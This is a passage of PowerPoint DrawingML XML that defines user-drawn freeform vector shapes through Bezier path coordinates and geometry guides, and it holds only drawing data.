                      <a:pt x="114" y="11"/>
                      <a:pt x="118" y="17"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="121" y="23"/>
                      <a:pt x="123" y="29"/>
                      <a:pt x="123" y="36"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="123" y="39"/>
                      <a:pt x="123" y="43"/>
                      <a:pt x="123" y="47"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="125" y="61"/>
                      <a:pt x="129" y="74"/>
                      <a:pt x="139" y="84"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="150" y="97"/>
                      <a:pt x="156" y="112"/>
                      <a:pt x="160" y="128"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="161" y="133"/>
                      <a:pt x="161" y="138"/>
                      <a:pt x="160" y="143"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="160" y="144"/>
                      <a:pt x="160" y="145"/>
                      <a:pt x="159" y="146"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="159" y="146"/>
                      <a:pt x="158" y="147"/>
                      <a:pt x="158" y="147"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="155" y="148"/>
                      <a:pt x="154" y="150"/>
                      <a:pt x="153" y="152"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="151" y="154"/>
                      <a:pt x="150" y="156"/>
                      <a:pt x="147" y="157"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="144" y="160"/>
                      <a:pt x="140" y="160"/>
                      <a:pt x="136" y="159"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="134" y="158"/>
                      <a:pt x="132" y="157"/>
                      <a:pt x="131" y="155"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="130" y="153"/>
                      <a:pt x="129" y="152"/>
                      <a:pt x="128" y="150"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="128" y="149"/>
                      <a:pt x="127" y="147"/>
                      <a:pt x="125" y="147"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="123" y="148"/>
                      <a:pt x="122" y="149"/>
                      <a:pt x="122" y="151"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="120" y="155"/>
                      <a:pt x="120" y="159"/>
                      <a:pt x="121" y="163"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="124" y="170"/>
                      <a:pt x="123" y="178"/>
                      <a:pt x="122" y="186"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="122" y="188"/>
                      <a:pt x="122" y="191"/>
                      <a:pt x="122" y="194"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="123" y="201"/>
                      <a:pt x="129" y="204"/>
                      <a:pt x="137" y="202"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="140" y="201"/>
                      <a:pt x="142" y="199"/>
                      <a:pt x="145" y="197"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="151" y="191"/>
                      <a:pt x="158" y="188"/>
                      <a:pt x="166" y="186"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="168" y="185"/>
                      <a:pt x="171" y="183"/>
                      <a:pt x="173" y="182"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="174" y="182"/>
                      <a:pt x="175" y="181"/>
                      <a:pt x="175" y="180"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="176" y="179"/>
                      <a:pt x="177" y="178"/>
                      <a:pt x="175" y="176"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="174" y="175"/>
                      <a:pt x="173" y="174"/>
                      <a:pt x="171" y="173"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="170" y="173"/>
                      <a:pt x="169" y="172"/>
                      <a:pt x="168" y="172"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="164" y="171"/>
                      <a:pt x="161" y="167"/>
                      <a:pt x="160" y="163"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="160" y="160"/>
                      <a:pt x="160" y="157"/>
                      <a:pt x="160" y="155"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="160" y="154"/>
                      <a:pt x="161" y="153"/>
                      <a:pt x="161" y="152"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="71" y="68"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="71" y="68"/>
                      <a:pt x="71" y="68"/>
                      <a:pt x="71" y="69"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="73" y="71"/>
                      <a:pt x="75" y="73"/>
                      <a:pt x="78" y="73"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="82" y="74"/>
                      <a:pt x="85" y="73"/>
                      <a:pt x="89" y="71"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="92" y="70"/>
                      <a:pt x="95" y="68"/>
                      <a:pt x="98" y="66"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="99" y="66"/>
                      <a:pt x="100" y="65"/>
                      <a:pt x="101" y="65"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="102" y="65"/>
                      <a:pt x="102" y="66"/>
                      <a:pt x="102" y="66"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="103" y="66"/>
                      <a:pt x="102" y="67"/>
                      <a:pt x="102" y="67"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="101" y="68"/>
                      <a:pt x="100" y="69"/>
                      <a:pt x="99" y="69"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="95" y="71"/>
                      <a:pt x="91" y="74"/>
                      <a:pt x="87" y="77"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="85" y="78"/>
                      <a:pt x="83" y="79"/>
                      <a:pt x="81" y="80"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="78" y="82"/>
                      <a:pt x="76" y="81"/>
                      <a:pt x="74" y="79"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="71" y="76"/>
                      <a:pt x="70" y="74"/>
                      <a:pt x="68" y="71"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="67" y="70"/>
                      <a:pt x="66" y="70"/>
                      <a:pt x="66" y="69"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="65" y="70"/>
                      <a:pt x="65" y="70"/>
                      <a:pt x="65" y="70"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="65" y="72"/>
                      <a:pt x="65" y="74"/>
                      <a:pt x="64" y="76"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="63" y="79"/>
                      <a:pt x="62" y="81"/>
                      <a:pt x="61" y="83"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="59" y="86"/>
                      <a:pt x="58" y="88"/>
                      <a:pt x="58" y="92"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="58" y="94"/>
                      <a:pt x="58" y="96"/>
                      <a:pt x="59" y="98"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="58" y="98"/>
                      <a:pt x="57" y="99"/>
                      <a:pt x="56" y="100"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="54" y="104"/>
                      <a:pt x="52" y="108"/>
                      <a:pt x="50" y="112"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="48" y="117"/>
                      <a:pt x="46" y="122"/>
                      <a:pt x="46" y="127"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="46" y="130"/>
                      <a:pt x="46" y="133"/>
                      <a:pt x="46" y="135"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="46" y="137"/>
                      <a:pt x="46"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0"/>
                      <a:pt x="38" y="120"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="38" y="121"/>
                      <a:pt x="37" y="122"/>
                      <a:pt x="37" y="123"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="36" y="127"/>
                      <a:pt x="36" y="131"/>
                      <a:pt x="37" y="135"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="38" y="137"/>
                      <a:pt x="38" y="140"/>
                      <a:pt x="40" y="142"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="44" y="146"/>
                      <a:pt x="48" y="149"/>
                      <a:pt x="52" y="153"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="57" y="157"/>
                      <a:pt x="62" y="161"/>
                      <a:pt x="67" y="165"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="69" y="166"/>
                      <a:pt x="70" y="169"/>
                      <a:pt x="69" y="172"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="69" y="174"/>
                      <a:pt x="67" y="176"/>
                      <a:pt x="65" y="177"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="64" y="177"/>
                      <a:pt x="63" y="177"/>
                      <a:pt x="63" y="177"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="64" y="179"/>
                      <a:pt x="65" y="181"/>
                      <a:pt x="66" y="183"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="68" y="185"/>
                      <a:pt x="69" y="188"/>
                      <a:pt x="70" y="191"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="70" y="193"/>
                      <a:pt x="70" y="195"/>
                      <a:pt x="70" y="197"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="71" y="197"/>
                      <a:pt x="71" y="197"/>
                      <a:pt x="71" y="197"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="73" y="195"/>
                      <a:pt x="73" y="193"/>
                      <a:pt x="73" y="190"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="72" y="188"/>
                      <a:pt x="71" y="186"/>
                      <a:pt x="69" y="184"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="69" y="183"/>
                      <a:pt x="68" y="182"/>
                      <a:pt x="69" y="182"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="69" y="181"/>
                      <a:pt x="71" y="181"/>
                      <a:pt x="72" y="182"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="74" y="184"/>
                      <a:pt x="77" y="185"/>
                      <a:pt x="79" y="185"/>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2"/>
                      <a:pt x="117" y="173"/>
                      <a:pt x="117" y="174"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="118" y="178"/>
                      <a:pt x="117" y="182"/>
                      <a:pt x="116" y="185"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="115" y="188"/>
                      <a:pt x="114" y="190"/>
                      <a:pt x="114" y="192"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="114" y="194"/>
                      <a:pt x="114" y="195"/>
                      <a:pt x="117" y="195"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="117" y="191"/>
                      <a:pt x="118" y="186"/>
                      <a:pt x="119" y="182"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="120" y="178"/>
                      <a:pt x="120" y="174"/>
                      <a:pt x="120" y="171"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="119" y="167"/>
                      <a:pt x="119" y="163"/>
                      <a:pt x="118" y="159"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="118" y="156"/>
                      <a:pt x="118" y="153"/>
                      <a:pt x="120" y="150"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="121" y="147"/>
                      <a:pt x="123" y="145"/>
                      <a:pt x="126" y="145"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="126" y="145"/>
                      <a:pt x="127" y="145"/>
                      <a:pt x="127" y="145"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="127" y="142"/>
                      <a:pt x="129" y="140"/>
                      <a:pt x="133" y="139"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="137" y="137"/>
                      <a:pt x="142" y="138"/>
                      <a:pt x="146" y="140"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="145" y="138"/>
                      <a:pt x="142" y="137"/>
                      <a:pt x="140" y="136"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="146" y="119"/>
                      <a:pt x="136" y="97"/>
                      <a:pt x="127" y="91"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="131" y="97"/>
                      <a:pt x="134" y="103"/>
                      <a:pt x="137" y="110"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="139" y="116"/>
                      <a:pt x="140" y="123"/>
                      <a:pt x="139" y="130"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="138" y="135"/>
                      <a:pt x="136" y="137"/>
                      <a:pt x="132" y="137"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="130" y="138"/>
                      <a:pt x="129" y="137"/>
                      <a:pt x="128" y="134"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="128" y="132"/>
                      <a:pt x="128" y="130"/>
                      <a:pt x="128" y="128"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="128" y="121"/>
                      <a:pt x="127" y="114"/>
                      <a:pt x="124" y="107"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="123" y="102"/>
                      <a:pt x="121" y="98"/>
                      <a:pt x="118" y="95"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="117" y="94"/>
                      <a:pt x="117" y="94"/>
                      <a:pt x="117" y="93"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="115" y="86"/>
                      <a:pt x="113" y="78"/>
                      <a:pt x="108" y="72"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="106" y="70"/>
                      <a:pt x="105" y="67"/>
                      <a:pt x="106" y="63"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="106" y="62"/>
                      <a:pt x="107" y="60"/>
                      <a:pt x="107" y="58"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="108" y="55"/>
                      <a:pt x="107" y="54"/>
                      <a:pt x="104" y="53"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="101" y="52"/>
                      <a:pt x="98" y="50"/>
                      <a:pt x="94" y="49"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="92" y="48"/>
                      <a:pt x="91" y="46"/>
                      <a:pt x="91" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="91" y="43"/>
                      <a:pt x="92" y="41"/>
                      <a:pt x="92" y="40"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="93" y="37"/>
                      <a:pt x="95" y="36"/>
                      <a:pt x="98" y="36"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="100" y="37"/>
                      <a:pt x="101" y="38"/>
                      <a:pt x="102" y="39"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="103" y="42"/>
                      <a:pt x="104" y="45"/>
                      <a:pt x="102" y="47"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="102" y="48"/>
                      <a:pt x="102" y="49"/>
                      <a:pt x="103" y="50"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="104" y="51"/>
                      <a:pt x="107" y="50"/>
                      <a:pt x="107" y="48"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="108" y="43"/>
                      <a:pt x="108" y="39"/>
                      <a:pt x="106" y="35"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="104" y="31"/>
                      <a:pt x="100" y="29"/>
                      <a:pt x="96" y="29"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="92" y="30"/>
                      <a:pt x="88" y="33"/>
                      <a:pt x="87" y="37"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="87" y="39"/>
                      <a:pt x="87" y="40"/>
                      <a:pt x="87" y="41"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="87" y="43"/>
                      <a:pt x="87" y="45"/>
                      <a:pt x="87" y="47"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="85" y="45"/>
                      <a:pt x="83" y="45"/>
                      <a:pt x="81" y="45"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="81" y="45"/>
                      <a:pt x="80" y="45"/>
                      <a:pt x="80" y="45"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="79" y="46"/>
                      <a:pt x="78" y="45"/>
                      <a:pt x="78" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="78" y="41"/>
                      <a:pt x="77" y="38"/>
                      <a:pt x="77" y="35"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="77" y="35"/>
                      <a:pt x="76" y="34"/>
                      <a:pt x="76" y="34"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="75" y="32"/>
                      <a:pt x="73" y="30"/>
                      <a:pt x="71" y="30"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="68" y="30"/>
                      <a:pt x="67" y="32"/>
                      <a:pt x="66" y="34"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="63" y="39"/>
                      <a:pt x="64" y="44"/>
                      <a:pt x="66" y="49"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="67" y="50"/>
                      <a:pt x="68" y="51"/>
                      <a:pt x="68" y="51"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="69" y="51"/>
                      <a:pt x="70" y="50"/>
                      <a:pt x="70" y="49"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="69" y="48"/>
                      <a:pt x="68" y="48"/>
                      <a:pt x="67" y="47"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="66" y="45"/>
                      <a:pt x="66" y="42"/>
                      <a:pt x="67" y="39"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="68" y="37"/>
                      <a:pt x="71" y="36"/>
                      <a:pt x="73" y="38"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="75" y="39"/>
                      <a:pt x="75" y="42"/>
                      <a:pt x="75" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="76" y="46"/>
                      <a:pt x="75" y="47"/>
                      <a:pt x="73" y="48"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="73" y="48"/>
                      <a:pt x="73" y="48"/>
                      <a:pt x="73" y="49"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="71" y="51"/>
                      <a:pt x="69" y="52"/>
                      <a:pt x="67" y="53"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="66" y="54"/>
                      <a:pt x="65" y="55"/>
                      <a:pt x="64" y="56"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="64" y="57"/>
                      <a:pt x="64" y="58"/>
                      <a:pt x="65" y="59"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="66" y="60"/>
                      <a:pt x="68" y="61"/>
                      <a:pt x="68" y="62"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="71" y="65"/>
                      <a:pt x="74" y="66"/>
                      <a:pt x="78" y="66"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="83" y="66"/>
                      <a:pt x="87" y="64"/>
                      <a:pt x="91" y="63"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="95" y="62"/>
                      <a:pt x="99" y="61"/>
                      <a:pt x="101" y="58"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="101" y="57"/>
                      <a:pt x="103" y="57"/>
                      <a:pt x="103" y="58"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="104" y="58"/>
                      <a:pt x="104" y="59"/>
                      <a:pt x="103" y="60"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="103" y="60"/>
                      <a:pt x="103" y="61"/>
                      <a:pt x="102" y="61"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="97" y="63"/>
                      <a:pt x="92" y="65"/>
                      <a:pt x="87" y="67"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="83" y="68"/>
                      <a:pt x="79" y="69"/>
                      <a:pt x="75" y="69"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="74" y="68"/>
                      <a:pt x="72" y="68"/>
                      <a:pt x="71" y="68"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="73" y="45"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="73" y="43"/>
                      <a:pt x="73" y="41"/>
                      <a:pt x="72" y="40"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="72" y="39"/>
                      <a:pt x="71" y="39"/>
                      <a:pt x="71" y="39"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="71" y="40"/>
                      <a:pt x="71" y="40"/>
                      <a:pt x="71" y="40"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="72" y="41"/>
                      <a:pt x="72" y="42"/>
                      <a:pt x="72" y="43"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="72" y="44"/>
                      <a:pt x="72" y="45"/>
                      <a:pt x="73" y="45"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="97" y="39"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="99" y="40"/>
                      <a:pt x="100" y="41"/>
                      <a:pt x="100" y="43"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="101" y="43"/>
                      <a:pt x="101" y="43"/>
                      <a:pt x="101" y="42"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="101" y="41"/>
                      <a:pt x="101" y="40"/>
                      <a:pt x="100" y="39"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="99"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Freeform 86"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6802" y="2978"/>
                <a:ext cx="3" cy="3"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 3 w 3"/>
                  <a:gd name="T1" fmla="*/ 1 h 3"/>
                  <a:gd name="T2" fmla="*/ 2 w 3"/>
                  <a:gd name="T3" fmla="*/ 2 h 3"/>
                  <a:gd name="T4" fmla="*/ 0 w 3"/>
                  <a:gd name="T5" fmla="*/ 3 h 3"/>
                  <a:gd name="T6" fmla="*/ 1 w 3"/>
                  <a:gd name="T7" fmla="*/ 1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2" y="1"/>
                      <a:pt x="2" y="2"/>
                      <a:pt x="2" y="2"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="2"/>
                      <a:pt x="1" y="3"/>
                      <a:pt x="0" y="3"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="2"/>
                      <a:pt x="0" y="2"/>
                      <a:pt x="1" y="1"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="1"/>
                      <a:pt x="2" y="1"/>
                      <a:pt x="2" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3" y="0"/>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Freeform 87"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6815" y="2978"/>
                <a:ext cx="4" cy="2"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 3"/>
                  <a:gd name="T1" fmla="*/ 0 h 2"/>
                  <a:gd name="T2" fmla="*/ 2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2"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Freeform 88"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="203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7"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Freeform 89"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="222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Freeform 90"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2425" y="3657"/>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Freeform 91"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2573"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Freeform 92"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2768"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6" name="Freeform 93"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2965"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7" name="Freeform 94"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3114"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Freeform 95"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3311" y="3657"/>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96"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3460"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Freeform 97"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3609"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1" y="36"/>
                      <a:pt x="17" y="27"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="23" y="18"/>
                      <a:pt x="30"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98"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3794" y="366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2" name="Freeform 99"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4223"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1 w 63"/>
                  <a:gd name="T19" fmla="*/ 44 h 240"/>
                  <a:gd name="T20" fmla="*/ 41 w 63"/>
                  <a:gd name="T21" fmla="*/ 84 h 240"/>
                  <a:gd name="T22" fmla="*/ 21 w 63"/>
                  <a:gd name="T23" fmla="*/ 120 h 240"/>
                  <a:gd name="T24" fmla="*/ 21 w 63"/>
                  <a:gd name="T25" fmla="*/ 120 h 240"/>
                  <a:gd name="T26" fmla="*/ 41 w 63"/>
                  <a:gd name="T27" fmla="*/ 155 h 240"/>
                  <a:gd name="T28" fmla="*/ 41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1" y="26"/>
                      <a:pt x="41" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="41" y="84"/>
                      <a:pt x="41" y="84"/>
                      <a:pt x="41" y="84"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="41" y="103"/>
